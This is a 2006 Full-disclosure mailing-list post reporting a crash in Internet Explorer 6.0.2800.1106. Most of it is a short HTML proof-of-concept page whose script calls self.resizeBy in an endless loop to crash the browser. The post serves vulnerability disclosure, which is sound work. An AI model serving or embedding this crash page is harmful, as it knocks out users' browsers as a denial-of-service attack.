[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability
- From: "r k" <kgp.143@xxxxxxxxx>
- Date: Fri, 26 May 2006 18:19:39 +0530
Hi All,
IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.
the following is the code
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);
while (wwidth)
{
self.resizeBy(-999999, -1);
}
</script>
</body>
</html>
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
tested on windows 2000,windows XP
thank you
antar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/